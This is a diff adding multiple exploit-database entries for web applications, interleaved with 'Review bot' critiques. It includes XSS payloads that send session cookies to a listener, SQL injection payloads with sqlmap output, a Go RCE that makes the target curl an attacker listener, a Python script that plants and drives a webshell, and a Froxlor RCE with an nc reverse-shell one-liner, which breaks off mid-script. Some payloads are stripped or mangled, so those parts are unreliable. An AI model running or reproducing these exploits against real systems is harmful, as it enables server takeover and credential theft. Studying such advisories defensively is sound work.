+Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 +Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +``` + +[+] Response: +``` +HTTP/2 200 OK +Server: nginx +Date: Sun, 29 Jan 2023 07:27:55 GMT 
+Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546 + +Class \App\Pages\Chatgiflc + does not exist
82
/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php
+``` + + +## Proof and Exploit: +[href](https://streamable.com/aadj5c) + +## Reference: +[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected) + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51241.txt b/exploits/php/webapps/51241.txt new file mode 100644 index 000000000..3b7d8cc55 --- /dev/null +++ b/exploits/php/webapps/51241.txt @@ -0,0 +1,51 @@ +# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) +# Date: 2022-05-25 +# Exploit Author: Mostafa Farzaneh +# WPScan page: +https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c +# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/ +# Software Link: +https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip +# Version: 1.4.06 +# Tested on: Linux +# CVE : CVE-2022-2846 +# Description: +The Calendar Event Multi View WordPress plugin before 1.4.07 does not have +any authorisation and CSRF checks in place when creating an event, and is +also lacking sanitisation as well as escaping in some of the event fields. +This could allow unauthenticated attackers to create arbitrary events and +put Cross-Site Scripting payloads in it. + +#POC and exploit code: +As an unauthenticated user, to add a malicious event (on October 6th, 2022) +to the calendar with ID 1, open the code below + + + +
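Review bot: The version information is inconsistent: the title says `zstore 6.6.0` while `## Software:` and `## Reproduce:` both point at `6.5.4`, so it is unclear which release was tested. The response shown is not an XSS rendering but a PHP error, `Class \App\Pages\Chatgiflc does not exist` from `webapplication.php` line 82, which means the `p=` parameter is reflected through an unhandled-exception page; that page also leaks the absolute path `/home/zippy00/zippy.com.ua/store/...`, an information disclosure worth noting separately and a sign that error display is on. The request is addressed to `store.zippy.com.ua`, the vendor's live host, which should be replaced by a lab instance in a published PoC, and the live `PHPSESSID` in the Cookie header should be redacted.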
+ + + + + + + + + + + + + + + + + +
+ + + +The XSS will be triggered when viewing the related event \ No newline at end of file diff --git a/exploits/php/webapps/51242.txt b/exploits/php/webapps/51242.txt new file mode 100644 index 000000000..05a4bcacd --- /dev/null +++ b/exploits/php/webapps/51242.txt @@ -0,0 +1,27 @@ +# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) +# Date: 2021-09-17 +# Exploit Author: Matteo Conti - https://deltaspike.io +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip +# Version: 1.0 +# Tested on: Ubuntu 18.04 - LAMP + +# Description +The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message, +maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it. + + +# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message) + +# Tested Payload: :/?'+document.cookie> + +# Prof of concept: + +- From /contact.php, send a message containing the following payload in "title" or "message" fields: + +:/?'+document.cookie> +(the first url have to be an existing image) + +- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php + +- Your listener will receive the PHP session id. \ No newline at end of file diff --git a/exploits/php/webapps/51245.txt b/exploits/php/webapps/51245.txt new file mode 100644 index 000000000..528208b79 --- /dev/null +++ b/exploits/php/webapps/51245.txt 
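Review bot: The PoC itself is missing: the text says "open the code below" and the hunk then contains only empty added lines before "The XSS will be triggered", so the HTML form that creates the event (most of the 51 added lines) was stripped and the entry is not reproducible. The version lines also disagree: the title names `1.4.07`, which the description identifies as the first fixed release ("before 1.4.07"), while `# Version:` and the software link say `1.4.06`; the title should read `Calendar Event Multi View 1.4.06 - ...`. Restore the form and name the endpoint and POST fields it targets.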
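Review bot: The `# Tested Payload:` and the payload in the proof-of-concept have been reduced to `:/?'+document.cookie>`; the opening tag and its attributes were stripped, so the payload cannot be reconstructed from the entry and should be quoted in a code span. The hint `(the first url have to be an existing image)` suggests an image-tag payload whose handler builds a request URL from `document.cookie`; say so explicitly. The final claim, "Your listener will receive the PHP session id", holds only if `PHPSESSID` is set without the `HttpOnly` flag, and that caveat belongs in the description.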
@@ -0,0 +1,74 @@ +## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) +## Author: nu11secur1ty +## Date: 01.31.2023 +## Vendor: https://bgerp.com/Bg/Za-sistemata +## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31 +## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based + +## Description: +The bgERP system suffers from unsecured login cookies in which cookies +are stored as very sensitive login and also login session information! +The attacker can trick the already login user and can steal the +already generated cookie from the system and can do VERY DANGEROUS +things with the already stored sensitive information. +This can be very expensive for all companies which are using this +system, please be careful! +Also, this system has a vulnerable search parameter for XSS-Reflected attacks! + +## STATUS: HIGH Vulnerability + +[+] Exploit: + +```GET +GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 +HTTP/1.1 +Host: 192.168.100.77:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; 
Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 +Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.100.77:8080/Portal/Show +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0 +Connection: close +Content-Length: 0 +``` + +[+] Response after logout of the system: +```HTTP +HTTP/1.1 302 Found +Date: Tue, 31 Jan 2023 15:13:26 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: 0 +Cache-Control: no-cache, must-revalidate +Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472 +Connection: close +Content-Length: 2 +Content-Encoding: none +Content-Type: text/html; charset=UTF-8 + +OK +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected) + +## Proof and Exploit: +[href](https://streamable.com/xhffdu) + +## Time spent +`01:30:00` + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: 
https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51246.txt b/exploits/php/webapps/51246.txt new file mode 100644 index 000000000..3ff9e421e --- /dev/null +++ b/exploits/php/webapps/51246.txt 
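Review bot: Neither claim in the title is supported by the evidence in the hunk. The only response shown is a `302 Found` "after logout of the system" whose `Location` header carries the `recentlySearch_14` payload percent-encoded (`%253Ca%2Bhref`), which a browser will not render, so it demonstrates that the search term is round-tripped in `ret_url`, not that it is reflected unescaped into HTML; the "Cookie Session vulnerability" is asserted in the description but no request or response shows a cookie being stolen or reused. A 200 response with the unencoded `<a href=...>` in the body, or a statement of where it is reflected after login, is needed before calling this reflected XSS. The payload also links to an adult site; a neutral URL is expected in a public PoC, and the live `SID`/`brid` cookies should be redacted.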
@@ -0,0 +1,76 @@ +# Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) +# Date: 2023-01-02 +# Exploit Author: Muhammad Navaid Zafar Ansari +# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip +# Version: 1.0 +# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian) +# CVE: Not Assigned Yet +# References: - + +------------------------------------------------------------------------------------ + +1. Description: +---------------------- + +Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +2. Proof of Concept: +---------------------- + +Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection. +Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql + +SQLMap Response: + +[*] starting @ 04:49:58 /2023-02-01/ + +[04:49:58] [INFO] testing connection to the target URL +you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). 
Do you want to use those [Y/n] n +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK +--- +[04:50:00] [INFO] testing MySQL +[04:50:00] [INFO] confirming MySQL +[04:50:00] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Debian +web application technology: Apache 2.4.55, PHP +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) + + +3. Example payload: +---------------------- + +(boolean-based) + +' AND 1=1 AND 'test'='test + + +4. Burpsuite request: +---------------------- + +GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1 +Host: localhost +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/51250.go b/exploits/php/webapps/51250.go new file mode 100755 index 000000000..71d5f7fe8 --- /dev/null +++ b/exploits/php/webapps/51250.go 
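Review bot: The metadata date does not match the evidence: `# Date: 2023-01-02` versus the sqlmap run stamped `/2023-02-01/`, so one of them is a transposition. The sqlmap output reads `resumed the following injection point(s) from stored session`, i.e. it is replayed from an earlier session rather than a fresh detection, which is fine but should be said. The Burp request's UNION payload (`union select 1,2,user(),4,...,version(),14-- -`) fixes the column count at 14 without saying how it was derived; one sentence on that would let a reader verify it, and the live `PHPSESSID` can be dropped from the request.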
@@ -0,0 +1,65 @@ +// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) +// Date: 2023-02-02 +// Exploit Author: Mayank Deshmukh +// Vendor Homepage: https://centos-webpanel.com/ +// Affected Versions: version < 0.9.8.1147 +// Tested on: Kali Linux +// CVE : CVE-2022-44877 +// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7 + +// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020 + +package main + +import ( + "bytes" + "crypto/tls" + "fmt" + "net/http" + "flag" + "time" +) + +func main() { + + var host,call string + flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)") + flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)") + + flag.Parse() + + banner := ` +-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =- +- by Mayank Deshmukh (ColdFusionX) + +` + fmt.Printf(banner) + fmt.Println("[*] Triggering cURL command") + + fmt.Println("[*] Open Listener on " + call + "") + + //Skip certificate validation + tr := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + client := &http.Client{Transport: tr} + + // Request URL + url := host + "/login/index.php?login=$(curl${IFS}" + call + ")" + + // Request body + body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login")) + + // Create HTTP client and send POST request + req, err := http.NewRequest("POST", url, body) + req.Header.Add("Content-Type", "application/x-www-form-urlencoded") + resp, err := client.Do(req) + if err != nil { + fmt.Println("Error sending request:", err) + return + } + time.Sleep(2 * time.Second) + + defer resp.Body.Close() + fmt.Println("\n[*] Check Listener for OOB callback") +} \ No newline at end of file diff --git a/exploits/php/webapps/51251.py b/exploits/php/webapps/51251.py new file mode 100755 index 000000000..0cc292b70 --- /dev/null +++ b/exploits/php/webapps/51251.py 
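Review bot: In `main`, the `err` returned by `http.NewRequest` is discarded (it is overwritten by the `client.Do` assignment two lines later), and neither `-u` nor `-i` is checked for being empty, so a run without flags builds the URL `/login/index.php?login=$(curl${IFS})` and dereferences a nil `req` if `NewRequest` failed. Add `if host == "" || call == "" { flag.Usage(); return }` after `flag.Parse()` and `if err != nil { fmt.Println("Error building request:", err); return }` after `http.NewRequest`. `fmt.Printf(banner)` passes a non-constant format string (`go vet` flags it and a `%` in the banner would misprint); `fmt.Print(banner)` is the intended call. The `time.Sleep` before `defer resp.Body.Close()` is harmless, but the body is never read, so the close could simply follow the error check.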
@@ -0,0 +1,158 @@ +# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE) +# Date: 02-Feb-2023 +# Exploit Author: Galoget Latorre (@galoget) +# Vendor Homepage: https://responsivefilemanager.com +# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip +# Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604 +# Version: 9.9.5 +# Language: Python 3.x +# Tested on: +# - Ubuntu 22.04.5 LTS 64-bit +# - Debian GNU/Linux 10 (buster) 64-bit +# - Kali GNU/Linux 2022.3 64-bit +# CVE: CVE-2022-46604 (Konstantin Burov) + + +#!/usr/bin/python3 +# -*- coding:utf-8 -*- + +import sys +import requests +from bs4 import BeautifulSoup +from termcolor import colored, cprint + + +# Usage: python3 exploit.py +# Example: python3 exploit.py 127.0.0.1 + + +def banner(): + """ + Function to print the banner + """ + + banner_text = """ + _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ +| | | | __| ___ |_ | |_ |_ | ___ | | | _| _| | | | +| --| | | __| |___| | _| | | _| _| |___| |_ | . | . | | |_ | +|_____|\\___/|_____| |___|___|___|___| |_|___|___|___| |_| + +File Creation Extension Bypass in Responsive FileManager ≤ 9.9.5 (RCE) +Exploit Author: Galoget Latorre (@galoget) +CVE Author: Konstantin Burov +""" + print(banner_text) + + +def usage_instructions(): + """ + Function that validates the number of arguments. 
+ The aplication MUST have 2 arguments: + - [0]: Name of the script + - [1]: Target site, which can be a domain or an IP Address + """ + if len(sys.argv) != 2: + print("Usage: python3 exploit.py ") + print("Example: python3 exploit.py 127.0.0.1") + sys.exit(0) + + +def run_command(web_session, webshell_url, command_to_run): + """ + Function that: + - Interacts with the webshell to run a command + - Cleans the response of the webshell + - Returns the response object and the output of the command + """ + webshell_response = web_session.get(url = webshell_url + f"?cmd={command_to_run}", headers = headers) + command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser') + return (webshell_response, command_output_soup.find('pre').text) + + +if __name__ == "__main__": + banner() + usage_instructions() + + # Change this with the domain or IP address to attack + if sys.argv[1]: + host = sys.argv[1] + else: + host = "127.0.0.1" + + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', + } + + + # URL to create a new file + target_url = f"http://{host}/filemanager/execute.php?action=create_file" + + # Change this to customize the payload (i.e. The content of the malicious file that will be created) + payload = "
\">
" + # oneliner_payload = " " + + # URL to get a PHPSESSID value + cookie_url = f"http://{host}/filemanager/dialog.php" + + # New Session + session = requests.Session() + + # GET request to retrieve a PHPSESSID value + cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue") + try: + session.get(url = cookie_url, headers = headers) + except: + cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red") + sys.exit(0) + + if session.cookies.get_dict(): + cprint("[+] PHPSESSID retrieved correctly.", "green") + cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow") + else: + cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red") + + # Params, rename if you want + params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload} + + # POST request to create the webshell + cprint(f"\n[*] Attempting to create a webshell on {host}", "blue") + response = session.post(url = target_url, headers = headers, data = params) + + # If the status code and the message match, we may have a webshell inside. ;) + if response.status_code == 200 and response.text == "File successfully saved.": + # Default webshell path + shell_url = f"http://{host}/source/shell.php" + + # Verify if the shell was uploaded by running whoami and cat /etc/passwd + webshell, whoami_output = run_command(session, shell_url, "whoami") + webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd") + + # Common users when getting a webshell + common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"] + + # Verify if the command was executed correctly + if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output: + cprint("[+] Webshell uploaded - Enjoy!", "green") + cprint(f"[!] 
Webshell available at '{shell_url}' - Enjoy!", "yellow") + cprint(f"[+] Running `whoami` command: {whoami_output}", "green") + + + # Ask to enter into a pseudo-interactive mode with the webshell + answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta")) + + if answer.upper() == "Y": + cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue") + command = "" + while command != "exit": + command = input(colored(">> ", "cyan")).lower() + webshell, command_output = run_command(session, shell_url, command) + if command != "exit": + cprint(command_output, "cyan") + + cprint("\n[*] Exiting...Bye!", "blue") + + elif response.status_code == 403 and response.text == "The file is already existing": + cprint("[-] The file that you're trying to create is already on the server.", "red") + + else: + cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red") \ No newline at end of file diff --git a/exploits/php/webapps/51253.txt b/exploits/php/webapps/51253.txt new file mode 100644 index 000000000..8d3fcd27a --- /dev/null +++ b/exploits/php/webapps/51253.txt @@ -0,0 +1,13 @@ +# Exploit Title: itech TrainSmart r1044 - SQL injection +# Date: 03.02.2023 +# Exploit Author: Adrian Bondocea +# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/ +# Version: TrainSmart r1044 +# Tested on: Linux +# CVE : CVE-2021-36520 + +SQL injection vulnerability in itech TrainSmart r1044 allows remote +attackers to view sensitive information via crafted command using sqlmap. + +PoC: +sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs \ No newline at end of file diff --git a/exploits/php/webapps/51260.txt b/exploits/php/webapps/51260.txt new file mode 100644 index 000000000..34ba9b535 --- /dev/null +++ b/exploits/php/webapps/51260.txt 
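Review bot: The success test `if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output:` declares a working webshell for any HTTP 200 (including an HTML error page), and the `"root:x::"` needle cannot match a real passwd entry (root's line begins `root:x:0:0:`), so both content checks are effectively dead; change it to `if webshell.status_code == 200 and (whoami_output.strip() in common_users or "root:x:0:0:" in passwd_output):`. In the interactive loop `command = input(colored(">> ", "cyan")).lower()` lower-cases every operator command, silently breaking case-sensitive paths and flags (`cat /etc/Passwd`, `ls -R`); drop the `.lower()`. `run_command` appends the command verbatim as `?cmd={command_to_run}`, so an `&`, `#` or `+` in a command truncates or corrupts it — pass `params={"cmd": command_to_run}` and let requests encode it. The `#!/usr/bin/python3` shebang sits after the header comment block and therefore does nothing; it belongs on line 1. The `payload` literal has had its markup stripped in this rendering, so the webshell body itself cannot be reviewed here.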
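Review bot: The PoC is a single sqlmap invocation, `sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs`, with no request, injection type or manual payload shown, so a reader cannot confirm the finding without re-running sqlmap; add the injection point sqlmap identified (parameter, type, payload) and one manual boolean- or time-based payload for `id`. The URL also carries a doubled slash (`//evaluation`), which should be `/evaluation`. If the `assign-evaluation` page is only reachable with a logged-in session, the advisory should say so and show the `--cookie` option, since that changes the finding from unauthenticated to authenticated SQLi.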
@@ -0,0 +1,29 @@ +# Exploit Title: CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) +# Google Dork: N/A +# Date: February 09, 2023 +# Exploit Author: Manish Pathak +# Vendor Homepage: https://cksource.com/ +# Software Link: https://ckeditor.com/ckeditor-5/download/ +# Version: 35.4.0 +# Tested on: Linux / Web +# CVE : CVE-2022-48110 + + + +CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via Full Featured CKEditor5 Widget as the editor fails to sanitize user provided data. + +An attacker can execute arbitrary script in the browser in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +CKEditor5 version 35.4.0 is tested & found to be vulnerable. + +Documentation avaiable at https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html#security + +Security Docs Says """The HTML embed feature does not currently execute code in + \ No newline at end of file diff --git a/exploits/php/webapps/51261.txt b/exploits/php/webapps/51261.txt new file mode 100644 index 000000000..f69d210ea --- /dev/null +++ b/exploits/php/webapps/51261.txt @@ -0,0 +1,14 @@ +# Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read +# Google Dork: N/A +# Date: 06/02/2023 +# Exploit Author: Cristian 'void' Giustini +# Vendor Homepage: https://imagemagick.org/ +# Software Link: https://imagemagick.org/ +# Version: <= 7.1.0-49 +# Tested on: 7.1.0-49 and 6.9.11-60 +# CVE : CVE-2022-44268 (CVE Owner: Metabase Q Team +https://www.metabaseq.com/imagemagick-zero-days/) +# Exploit pre-requirements: Rust + + +# PoC : https://github.com/voidz0r/CVE-2022-44268 \ No newline at end of file diff --git a/exploits/php/webapps/51263.py b/exploits/php/webapps/51263.py new file mode 100755 index 000000000..3d3a78511 --- /dev/null +++ b/exploits/php/webapps/51263.py 
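Review bot: The quoted vendor sentence `The HTML embed feature does not currently execute code in` breaks off mid-sentence and no embed payload follows it in this rendering, so the reproduction steps are missing from the entry as stored; the exact HTML submitted through the embed widget and the step that makes it execute need to be given in plain, escaped text so the archive does not strip them. The cited `html-embed.html#security` page is the vendor's own statement of this feature's security model, so the note should say explicitly how the observed behaviour differs from what that page documents — otherwise the report reads as the documented behaviour of an integration that embeds raw HTML. `avaiable` is a typo for `available`.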
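Review bot: The entry is only a link to an external repository (`https://github.com/voidz0r/CVE-2022-44268`) and describes neither how the file read is triggered nor how the leaked content is recovered, so it becomes useless if that repository moves or is deleted; a short inline summary of the crafted input, the ImageMagick invocation that triggers the read, and where the leaked bytes appear is needed. `Software Link` repeats the vendor homepage rather than pointing at an affected release, and `Version: <= 7.1.0-49` gives no fixed version, which a reader needs to triage.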
@@ -0,0 +1,139 @@ +#!/usr/bin/python3 + +# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE) +# Date: 2023-01-08 +# Exploit Author: Askar (@mohammadaskar2) +# CVE: CVE-2023-0315 +# Vendor Homepage: https://froxlor.org/ +# Version: v2.0.3 +# Tested on: Ubuntu 20.04 / PHP 8.2 + +import telnetlib +import requests +import socket +import sys +import warnings +import random +import string +from bs4 import BeautifulSoup +from urllib.parse import quote +from threading import Thread + +warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') + + +if len(sys.argv) !=3D 6: + print("[~] Usage : ./froxlor-rce.py url username password ip port") + exit() + +url =3D sys.argv[1] +username =3D sys.argv[2] +password =3D sys.argv[3] +ip =3D sys.argv[4] +port =3D sys.argv[5] + +request =3D requests.session() + +def login(): + login_info =3D { + "loginname": username, + "password": password, + "send": "send", + "dologin": "" + } + login_request =3D request.post(url+"/index.php", login_info, allow_redi= +rects=3DFalse) + login_headers =3D login_request.headers + location_header =3D login_headers["Location"] + if location_header =3D=3D "admin_index.php": + return True + else: + return False + + +def change_log_path(): + change_log_path_url =3D url + "/admin_settings.php?page=3Doverview&part= +=3Dlogging" + csrf_token_req =3D request.get(change_log_path_url) + csrf_token_req_response =3D csrf_token_req.text + soup =3D BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) + print("[+] Main CSRF token retrieved %s" % csrf_token) + + multipart_data =3D { + + "logger_enabled": (None, "0"), + "logger_enabled": (None, "1"), + "logger_severity": (None, "2"), + "logger_logtypes[]": (None, "file"), + "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/f= +ooter.html.twig"), + "logger_log_cron": (None, "0"), + "csrf_token": (None, csrf_token), + "page": (None, "overview"), + "action": 
(None, ""), + "send": (None, "send") + =20 + } + req =3D request.post(change_log_path_url, files=3Dmultipart_data) + response =3D req.text + if "The settings have been successfully saved." in response: + print("[+] Changed log file path!") + return True + else: + return False + + +def inject_template(): + admin_page_path =3D url + "/admin_index.php" + csrf_token_req =3D request.get(admin_page_path) + csrf_token_req_response =3D csrf_token_req.text + soup =3D BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) + onliner =3D "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} = +{1} >/tmp/f".format(ip, port) + payload =3D "{{['%s']|filter('exec')}}" % onliner + data =3D { + "theme": payload, + "csrf_token": csrf_token, + "page": "change_theme", + "send": "send", + "dosave": "", + } + req =3D request.post(admin_page_path, data, allow_redirects=3DFalse) + try: + location_header =3D req.headers["Location"] + if location_header =3D=3D "admin_index.php": + print("[+] Injected the payload sucessfully!") + except: + print("[-] Can't Inject payload :/") + exit() + handler_thread 